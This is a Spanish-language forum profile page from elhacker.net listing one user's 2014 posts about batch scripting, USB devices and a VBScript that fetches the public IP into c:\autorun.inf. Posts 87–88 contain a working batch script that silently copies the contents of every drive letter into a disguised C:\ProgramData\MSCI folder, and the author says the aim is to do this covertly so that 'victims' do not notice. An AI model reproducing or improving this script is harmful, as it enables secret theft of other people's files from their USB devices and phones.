elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10
81  Programación / Scripting / Re: [Batch] Hacerlo mas intuitivo en: 13 Marzo 2014, 15:48 pm
es justo lo que busco, pero si quiero poner muchas lineas mientras aparece el mensaje, con esas lineas que me das me valdría o tendría que hacerla que repetirla??
82  Programación / Scripting / Re: [Batch] Hacerlo mas intuitivo en: 13 Marzo 2014, 14:06 pm
quiero que mientras haga un ejemplo este proceso
Código:
@echo off

set name=part*
set name2=rar
ren *.%name%.%name2% AC3.%name%.%name2%

en la consola cmd se vea "cargando..."
83  Programación / Scripting / [Batch] Hacerlo mas intuitivo en: 13 Marzo 2014, 11:49 am
lo que quería es que si le pido un comando de abrir un puerto, mientras hace eso que me salga otra cosa en la cmd, por ejemplo "cargando..." para que no se haga tanto royo
84  Sistemas Operativos / Windows / Re: [DUDA] Como Desactivar Dispositivos Portátiles Para Que Se Le Asigne Una Letra en: 11 Marzo 2014, 15:23 pm
lo de los grupos no se como hacerlo y lo de firmware lo intente y no hay ninguna.
85  Programación / .NET (C#, VB.NET, ASP) / Re: ¿cifrar? en: 11 Marzo 2014, 14:14 pm
creo que esto es lo que buscas http://norfipc.com/comandos/bloquear-proteger-carpetas.html espero que te sea de ayuda y no haber incumplido una regla por poner este link,(no me cachondeo). Solo lo puse como algo educativo y relacionado con el tema de cifrar
86  Sistemas Operativos / Windows / [DUDA] Como Desactivar Dispositivos Portátiles Para Que Se Le Asigne Una Letra en: 11 Marzo 2014, 14:12 pm
Como puedo cambiar el modo en el que Windows reconoce el dispositivo, a dispositivo de almacenamiento (mass storage device) para que a este se le asigne una letra de unidad??
87  Programación / Scripting / Re: [Bat] Copiar Carpetas y Archivos USB en: 10 Marzo 2014, 14:02 pm
el problema es que no me lo detecta como un USB, sino como nose como si fuera otra cosa, por poder puedo copiar manualmente, pero quiero hacerlo de forma oculta para que no se dean cuenta mis victimas, fijate en el nombre que le da windows cuando lo conecto, gracias por comentar ;)
88  Programación / Scripting / [Bat] Copiar Carpetas y Archivos USB en: 10 Marzo 2014, 12:36 pm
hola, e creado un bat para que cada vez que un USB se conecte me copie todos los archivos, hasta hay todo bien. El problema es cuando se conecta un dispositivo móvil me aparece asi ejecuto el bat y no copia sus archivos, posibles soluciones por favor??

Código:
@echo off
Mkdir C:\ProgramData\MSCI
xcopy /e /i A:\* C:\ProgramData\MSCI
xcopy /e /i B:\* C:\ProgramData\MSCI
xcopy /e /i D:\* C:\ProgramData\MSCI
xcopy /e /i E:\* C:\ProgramData\MSCI
xcopy /e /i F:\* C:\ProgramData\MSCI
xcopy /e /i G:\* C:\ProgramData\MSCI
xcopy /e /i H:\* C:\ProgramData\MSCI
xcopy /e /i I:\* C:\ProgramData\MSCI
xcopy /e /i J:\* C:\ProgramData\MSCI
xcopy /e /i K:\* C:\ProgramData\MSCI
xcopy /e /i L:\* C:\ProgramData\MSCI
xcopy /e /i M:\* C:\ProgramData\MSCI
xcopy /e /i N:\* C:\ProgramData\MSCI
xcopy /e /i Ñ:\* C:\ProgramData\MSCI
xcopy /e /i O:\* C:\ProgramData\MSCI
xcopy /e /i P:\* C:\ProgramData\MSCI
xcopy /e /i Q:\* C:\ProgramData\MSCI
xcopy /e /i R:\* C:\ProgramData\MSCI
xcopy /e /i S:\* C:\ProgramData\MSCI
xcopy /e /i T:\* C:\ProgramData\MSCI
xcopy /e /i U:\* C:\ProgramData\MSCI
xcopy /e /i V:\* C:\ProgramData\MSCI
xcopy /e /i W:\* C:\ProgramData\MSCI
xcopy /e /i X:\* C:\ProgramData\MSCI
xcopy /e /i Y:\* C:\ProgramData\MSCI
xcopy /e /i Z:\* C:\ProgramData\MSCI
89  Programación / Scripting / Re: [DUDA] Batch o FTP en: 8 Marzo 2014, 22:10 pm
perfecto ahora si me va ;)
90  Programación / Scripting / Re: [DUDA] Batch o FTP en: 8 Marzo 2014, 18:51 pm

[MOD]: Debes utilizar las etiquetas para insertar código, lee las normas.



Código
  1. Set objFSO=CreateObject("Scripting.FileSystemObject")
  2. outFile="c:\autorun.inf"
  3. Set objFile = objFSO.CreateTextFile(outFile,True)
  4. objFile.Write WAN_IP() & vbCrLf
  5. objFile.Close
  6.  
  7. function WAN_IP()
  8.    set obj = createobject("Microsoft.XMLHTTP")
  9.    call obj.open("get", "http://ifconfig.me/ip", false)
  10.    obj.send()
  11.  
  12.    strresponse = obj.responsetext
  13.    set obj = nothing
  14.  
  15.    if strresponse <> "" then
  16.        strIP = strresponse
  17.    else
  18.        strIP = "Unavailable"
  19.    end if
  20.  
  21.    WAN_IP = trim(strIP)
  22.  
  23. end function


ese el code que pongo, le doy clic derecho y no me sale para ejecutar como administrador :S
Páginas: 1 2 3 4 5 6 7 8 [9] 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines